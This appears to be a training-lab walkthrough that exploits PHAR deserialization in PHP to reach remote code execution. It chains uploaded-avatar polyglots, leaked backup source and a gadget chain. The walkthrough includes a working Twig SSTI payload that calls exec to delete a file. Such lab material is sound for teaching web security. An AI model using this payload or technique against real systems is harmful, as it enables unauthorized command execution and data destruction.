This lab does not explicitly use deserialization. However, if you combine PHAR deserialization with other advanced hacking techniques, you can still achieve remote code execution via a custom gadget chain.
To solve the lab, delete the morale.txt file from Carlos's home directory.
You can log in to your own account using the following credentials: wiener:peter
Learning path
If you're following our suggested learning path, please note that this lab requires some understanding of topics that we haven't covered yet. Don't worry if you get stuck; try coming back later once you've developed your knowledge further.
Observe that the website has a feature for uploading your own avatar, which only accepts JPG images. Upload a valid JPG as your avatar. Notice that it is loaded using GET /cgi-bin/avatar.php?avatar=wiener.
In Burp Repeater, request GET /cgi-bin to find an index that shows a Blog.php and CustomTemplate.php file. Obtain the source code by requesting the files using the .php~ backup extension.
Study the source code and identify the gadget chain involving the Blog->desc and CustomTemplate->lockFilePath attributes.
Notice that the file_exists() filesystem method is called on the lockFilePath attribute.
Notice that the website uses the Twig template engine. You can use deserialization to pass in an server-side template injection (SSTI) payload. Find a documented SSTI payload for remote code execution on Twig, and adapt it to delete Carlos's file:
Write a some PHP for creating a CustomTemplate and Blog containing your SSTI payload:
class CustomTemplate {}
class Blog {}
$object = new CustomTemplate;
$blog = new Blog;
$blog->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}';
$blog->user = 'user';
$object->template_file_path = $blog;
Create a PHAR-JPG polyglot containing your PHP script. You can find several scripts for doing this online (search for "phar jpg polyglot"). Alternatively, you can download our ready-made one.
Upload this file as your avatar.
In Burp Repeater, modify the request line to deserialize your malicious avatar using a phar:// stream as follows:
GET /cgi-bin/avatar.php?avatar=phar://wiener
Send the request to solve the lab.
Want to track your progress and have a more personalized learning experience? (It's free!)
